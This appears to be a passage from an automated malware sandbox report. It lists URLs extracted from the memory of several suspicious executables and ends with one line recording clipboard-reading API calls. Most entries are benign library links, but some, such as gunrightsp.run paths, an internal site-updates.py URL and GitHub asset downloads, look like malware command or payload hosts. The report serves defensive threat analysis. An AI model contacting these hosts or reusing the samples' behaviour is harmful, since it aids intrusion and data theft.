                                      Source: trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1863172789.000001E16B56F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806059046.000001E16BAE5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880210684.000001E16BC1A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883906457.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880906094.000001E16B582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1942810073.000001E16B58C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1822487423.000001E16B586000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946483979.000001E16BAEA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880906094.000001E16B58C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806059046.000001E16BAE5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883906457.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                                      Source: trano1221.exe, 0000002A.00000003.1832271041.000001E16B61B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                                      Source: UD49QH6.exe, 00000010.00000003.5078356884.000000000139A000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1466867227.0000000001393000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1507260993.000000000139A000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1491760052.000000000139A000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1417238243.0000000001324000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1481800211.000000000139A000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1417238243.0000000001314000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run/
                                      Source: UD49QH6.exe, 00000010.00000003.1508423546.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.5078356884.000000000139A000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1507260993.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1481800211.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1491760052.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2080300600.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.5078654939.000000000133B000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1466867227.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2079265890.0000000001338000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1508155790.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1417138519.0000000001339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run/bksaHyg
                                      Source: UD49QH6.exe, 00000010.00000003.1508423546.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run/bksaHyg0
                                      Source: UD49QH6.exe, 00000010.00000003.1507260993.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1481800211.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1491760052.00000000013A9000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2080300600.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1466867227.00000000013A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run/bksaHygAzw8
                                      Source: UD49QH6.exe, 00000010.00000003.1508423546.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1463213398.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run/bksaHygu
                                      Source: UD49QH6.exe, 00000010.00000003.2079965638.0000000005C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run:443/bksaHyg2
                                      Source: UD49QH6.exe, 00000010.00000003.1463213398.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gunrightsp.run:443/bksaHygicrosoft
                                      Source: trano1221.exe, 0000002A.00000003.1815421865.000001E16BBCE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832831955.000001E16BBE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                                      Source: trano1221.exe, 0000002A.00000003.1880906094.000001E16B582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                      Source: trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
                                      Source: UD49QH6.exe, 00000010.00000003.1450202345.0000000005B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
                                      Source: trano1221.exe, 0000002A.00000002.1949395926.000001E16BD20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
                                      Source: trano1221.exe, 0000002A.00000003.1815421865.000001E16BBCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                                      Source: trano1221.exe, 0000002A.00000003.1894885445.000001E16BC08000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813822027.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1831036072.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1871438491.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1881267013.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882569817.000001E16BC07000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815421865.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882379108.000001E16BBFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
                                      Source: powershell.exe, 00000019.00000002.1600308325.00000000058D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                      Source: futors.exe, 0000000F.00000003.1400745031.0000000001543000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1553741184.0000000001547000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/
                                      Source: futors.exe, 0000000F.00000003.1400745031.0000000001543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/f%
                                      Source: futors.exe, 0000000F.00000003.1811877759.0000000003F80000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1811811339.0000000003F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/925133393/acb1529f-d07e
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/931090743/fe2351f3-d512
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/942997733/91e9cb20-bc50
                                      Source: futors.exe, 0000000F.00000003.1948303472.0000000003F82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/948814638/06c7ea24-3162
                                      Source: futors.exe, 0000000F.00000003.1963918863.0000000003F87000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1963918863.0000000003F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/949262026/4eb1afe7-d182
                                      Source: futors.exe, 0000000F.00000003.1400745031.0000000001543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/nZT
                                      Source: trano1221.exe, 0000002A.00000003.1804418435.000001E16B9B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
                                      Source: trano1221.exe, 0000002A.00000002.1941681244.000001E16B3E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                                      Source: trano1221.exe, 0000002A.00000002.2006486368.00007FF98E76B000.00000040.00000001.01000000.0000001C.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/importlib_metadata
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
                                      Source: trano1221.exe, 0000002A.00000003.1638675310.000001E16B605000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1643633653.000001E16B620000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1642098430.000001E16B61D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1693368884.000001E16B53F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1698853025.000001E16B52A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1822487423.000001E16B586000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1646562116.000001E16B53F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1639883128.000001E16B5B3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1656139769.000001E16B567000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1638675310.000001E16B605000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1643633653.000001E16B620000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1658799975.000001E16B53F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1672685606.000001E16B53F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1642098430.000001E16B61D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: trano1221.exe, 0000002A.00000003.1638675310.000001E16B605000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1643633653.000001E16B620000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1642098430.000001E16B61D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr:
Source: trano1221.exe, 0000002A.00000003.1638675310.000001E16B605000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1643633653.000001E16B620000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1642098430.000001E16B61D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr:r;Nr
Source: m0wsoI3.exe, 00000011.00000003.1501994471.000000000F41E000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1531427752.0000000010285000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: m0wsoI3.exe, 00000011.00000002.1531427752.0000000010285000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefox
Source: UD49QH6.exe, 00000010.00000003.1449386649.0000000005E8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: m0wsoI3.exe, 00000011.00000003.1501994471.000000000F41E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816453607.000001E16B538000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1884450015.000001E16B539000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1814171740.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839236500.000001E16B56B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1884778841.000001E16BC1D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807134122.000001E16BC19000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1863172789.000001E16B56F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880210684.000001E16BC1A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880906094.000001E16B582000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/
Source: trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN
Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882675982.000001E16BAB0000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1717851242.000001E16BA15000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1858813276.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1717851242.000001E16BA6C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
Source: UD49QH6.exe, 00000010.00000003.1462695917.0000000005B73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: trano1221.exe, 00000023.00000003.1604145252.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.apache.org/licenses/
Source: trano1221.exe, 00000023.00000003.1604145252.0000013C2C401000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1604306017.0000013C2C402000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1604145252.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: UD49QH6.exe, 00000010.00000003.1450202345.0000000005B74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: UD49QH6.exe, 00000010.00000003.1450202345.0000000005B90000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: m0wsoI3.exe, 00000011.00000002.1531427752.0000000010285000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/
Source: m0wsoI3.exe, 00000011.00000003.1501994471.000000000F41E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: m0wsoI3.exe, 00000011.00000002.1531427752.0000000010285000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
Source: m0wsoI3.exe, 00000011.00000003.1501994471.000000000F41E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: m0wsoI3.exe, 00000011.00000003.1501994471.000000000F41E000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1531427752.0000000010285000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: m0wsoI3.exe, 00000011.00000002.1531427752.0000000010285000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: UD49QH6.exe, 00000010.00000003.1449386649.0000000005E8D000.00000004.00000800.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000003.1501994471.000000000F41E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1984742205.00007FF98C2B7000.00000004.00000001.01000000.0000002C.sdmp, trano1221.exe, 0000002A.00000002.1980746377.00007FF98BDB8000.00000004.00000001.01000000.0000002D.sdmp | String found in binary or memory: https://www.openssl.org/H
Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.python.org
Source: trano1221.exe, 0000002A.00000003.1894885445.000001E16BC08000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813822027.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1831036072.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1871438491.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1881267013.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882569817.000001E16BC07000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815421865.000001E16BBFA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882379108.000001E16BBFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.python.org/
Source: trano1221.exe, 0000002A.00000002.1933157269.000001E16AE60000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: trano1221.exe, 0000002A.00000002.2006486368.00007FF98E808000.00000040.00000001.01000000.0000001C.sdmp | String found in binary or memory: https://www.python.org/psf/license/
Source: trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: trano1221.exe, 0000002A.00000003.1882675982.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1942810073.000001E16B58C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1822487423.000001E16B586000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946483979.000001E16BAEA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880906094.000001E16B58C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806059046.000001E16BAE5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883906457.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://yahoo.com/
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Code function: 18_2_006BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
